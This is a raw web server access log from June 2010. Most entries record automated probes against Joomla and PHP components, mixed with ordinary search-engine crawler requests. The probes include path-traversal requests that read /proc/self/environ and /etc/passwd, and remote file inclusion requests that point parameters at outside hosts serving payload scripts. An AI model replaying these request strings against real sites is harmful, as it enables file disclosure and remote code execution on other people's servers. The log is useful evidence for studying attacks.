94.23.0.30 - - [01/Jun/2010:20:25:50 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.803"
174.121.158.187 - - [01/Jun/2010:20:26:17 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.810"
174.121.158.187 - - [01/Jun/2010:20:26:17 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.810"
216.245.220.19 - - [01/Jun/2010:20:26:35 -0500] "GET /index.php?option=com_abbrev&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.245.220.19 - - [01/Jun/2010:20:26:35 -0500] "GET /logs/index.php?option=com_abbrev&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.245.220.19 - - [01/Jun/2010:20:26:35 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:20:26:58 -0500] "GET /logs/index.php?option=com_abbrev&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:20:26:58 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:20:26:58 -0500] "GET /index.php?option=com_abbrev&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
193.164.131.82 - - [01/Jun/2010:20:27:14 -0500] "GET /logs/index2.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.164.131.82 - - [01/Jun/2010:20:27:15 -0500] "GET /index2.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [01/Jun/2010:20:27:24 -0500] "GET /logs/access_log.1161043200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.81.68.114 - - [01/Jun/2010:20:29:40 -0500] "GET /logs/index2.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.81.68.114 - - [01/Jun/2010:20:29:40 -0500] "GET /index2.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.250.255.243 - - [01/Jun/2010:20:32:34 -0500] "GET /logs/access_log.1272758400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
123.243.67.208 - - [01/Jun/2010:20:33:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
74.54.78.146 - - [01/Jun/2010:20:36:42 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.54.78.146 - - [01/Jun/2010:20:36:42 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.54.78.146 - - [01/Jun/2010:20:36:42 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.51.171.188 - - [01/Jun/2010:20:37:09 -0500] "GET /logs/index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
209.51.171.188 - - [01/Jun/2010:20:37:09 -0500] "GET /index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
193.164.131.82 - - [01/Jun/2010:20:37:18 -0500] "GET /logs/index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.164.131.82 - - [01/Jun/2010:20:37:19 -0500] "GET /index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.65.69.227 - - [01/Jun/2010:20:37:40 -0500] "GET /logs/index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
216.65.69.227 - - [01/Jun/2010:20:37:40 -0500] "GET /index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.81.68.114 - - [01/Jun/2010:20:39:51 -0500] "GET /logs/index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.81.68.114 - - [01/Jun/2010:20:39:51 -0500] "GET /index2.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.204.181 - - [01/Jun/2010:20:40:11 -0500] "GET /logs/access_log.1193875200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
119.63.193.56 - - [01/Jun/2010:20:40:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
209.51.171.188 - - [01/Jun/2010:20:41:20 -0500] "GET /logs/index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
209.51.171.188 - - [01/Jun/2010:20:41:20 -0500] "GET /index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
193.164.131.82 - - [01/Jun/2010:20:41:21 -0500] "GET /logs/index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.164.131.82 - - [01/Jun/2010:20:41:21 -0500] "GET /index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.47.80.46 - - [01/Jun/2010:20:41:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.46 - - [01/Jun/2010:20:41:30 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
216.65.69.227 - - [01/Jun/2010:20:41:35 -0500] "GET /logs/index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
216.65.69.227 - - [01/Jun/2010:20:41:35 -0500] "GET /index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.81.68.114 - - [01/Jun/2010:20:42:45 -0500] "GET /logs/index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.81.68.114 - - [01/Jun/2010:20:42:45 -0500] "GET /index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.88.4.141 - - [01/Jun/2010:20:45:35 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.79"
121.88.4.141 - - [01/Jun/2010:20:45:36 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
121.88.4.141 - - [01/Jun/2010:20:45:36 -0500] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7929 "-""libwww-perl/5.79"
207.46.204.237 - - [01/Jun/2010:20:46:40 -0500] "GET /logs/access_log.1217289600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.89.1.2 - - [01/Jun/2010:20:48:19 -0500] "GET /logs/access_log.1262649600 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1262649600""Opera/9.63 (Windows NT 6.0; U; en) Presto/2.1.1"
207.46.13.49 - - [01/Jun/2010:20:50:11 -0500] "GET /logs/access_log.1181260800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.245.220.19 - - [01/Jun/2010:20:50:31 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
216.245.220.19 - - [01/Jun/2010:20:50:31 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.245.220.19 - - [01/Jun/2010:20:50:31 -0500] "GET /?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:20:52:06 -0500] "GET //includes/class_item.php?fileExtension=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:20:52:06 -0500] "GET /logs//includes/class_item.php?fileExtension=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:20:52:06 -0500] "GET /logs/access_log.1271376000//includes/class_item.php?fileExtension=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:20:52:25 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:20:52:25 -0500] "GET /?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:20:52:25 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
84.40.30.37 - - [01/Jun/2010:20:52:39 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [01/Jun/2010:20:52:39 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [01/Jun/2010:20:52:39 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [01/Jun/2010:20:53:09 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [01/Jun/2010:20:53:09 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [01/Jun/2010:20:53:10 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.2.140 - - [01/Jun/2010:20:54:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.2.140 - - [01/Jun/2010:20:55:31 -0500] "GET /logs/access_log.1212710400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.245.220.19 - - [01/Jun/2010:20:56:42 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.245.220.19 - - [01/Jun/2010:20:56:42 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.245.220.19 - - [01/Jun/2010:20:56:42 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:20:58:42 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:20:58:42 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:20:58:42 -0500] "GET /logs/access_log.1271462400/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:20:59:13 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
174.121.67.233 - - [01/Jun/2010:21:00:07 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
174.121.67.233 - - [01/Jun/2010:21:00:07 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
174.121.67.233 - - [01/Jun/2010:21:00:07 -0500] "GET /logs/access_log.1271548800//bookmark4u/lostpasswd.php?env[include_prefix]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:00:24 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:00:25 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:00:25 -0500] "GET /logs/access_log.1271462400/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:00:36 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:01:09 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:01:09 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:01:09 -0500] "GET /logs/access_log.1271462400/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:01:12 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:01:12 -0500] "GET /logs/access_log.1271462400/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:01:12 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:01:22 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:21:01:25 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:21:01:25 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:21:01:25 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.135.61.13 - - [01/Jun/2010:21:01:27 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.195.112.180 - - [01/Jun/2010:21:02:47 -0500] "GET /artwork/postcards.htm HTTP/1.0" 200 690 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.100.228.237 - - [01/Jun/2010:21:02:47 -0500] "GET /logs/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:21:02:47 -0500] "GET /logs/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:21:02:48 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:21:02:48 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
220.80.108.70 - - [01/Jun/2010:21:06:38 -0500] "GET /logs/access_log.1271548800/view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
220.80.108.70 - - [01/Jun/2010:21:06:39 -0500] "GET /view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
220.80.108.70 - - [01/Jun/2010:21:06:39 -0500] "GET /logs/view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.50.54.236 - - [01/Jun/2010:21:08:27 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
218.50.54.236 - - [01/Jun/2010:21:08:28 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
218.50.54.236 - - [01/Jun/2010:21:08:28 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
220.80.108.70 - - [01/Jun/2010:21:08:52 -0500] "GET /logs/access_log.1271376000/view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:11:48 -0500] "GET /view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:11:48 -0500] "GET /logs/access_log.1271548800/view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:11:48 -0500] "GET /logs/view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
207.46.195.202 - - [01/Jun/2010:21:13:40 -0500] "GET /logs/access_log.1263081600 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729)"
67.195.112.180 - - [01/Jun/2010:21:14:43 -0500] "GET /logs/access_log.1212105600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.88.4.141 - - [01/Jun/2010:21:15:24 -0500] "GET /logs/access_log.1271376000/view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:15:33 -0500] "GET /view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:15:33 -0500] "GET /logs/view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:15:36 -0500] "GET /logs/access_log.1271548800/view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.19.84.13 - - [01/Jun/2010:21:15:45 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.88.4.141 - - [01/Jun/2010:21:16:04 -0500] "GET /logs/access_log.1271376000/view.php?id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.153.27.146 - - [01/Jun/2010:21:16:16 -0500] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
85.153.27.146 - - [01/Jun/2010:21:16:16 -0500] "GET /logs/access_log.1274832000%20%20//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.153.27.146 - - [01/Jun/2010:21:16:17 -0500] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.153.27.146 - - [01/Jun/2010:21:18:07 -0500] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
85.153.27.146 - - [01/Jun/2010:21:18:07 -0500] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.153.27.146 - - [01/Jun/2010:21:18:07 -0500] "GET /logs/access_log.1274832000//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://xovev.110mb.com/z1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
67.195.112.180 - - [01/Jun/2010:21:19:43 -0500] "GET /logs/access_log.1185753600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.141 - - [01/Jun/2010:21:20:10 -0500] "GET /logs/access_log.1203033600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.52.128 - - [01/Jun/2010:21:25:31 -0500] "GET /logs//com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.803"
94.23.52.128 - - [01/Jun/2010:21:25:31 -0500] "GET //com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.803"
206.19.84.13 - - [01/Jun/2010:21:25:47 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
206.19.84.13 - - [01/Jun/2010:21:25:47 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
206.19.84.13 - - [01/Jun/2010:21:25:47 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.246.72.178 - - [01/Jun/2010:21:26:25 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:26:25 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:26:25 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:27:09 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
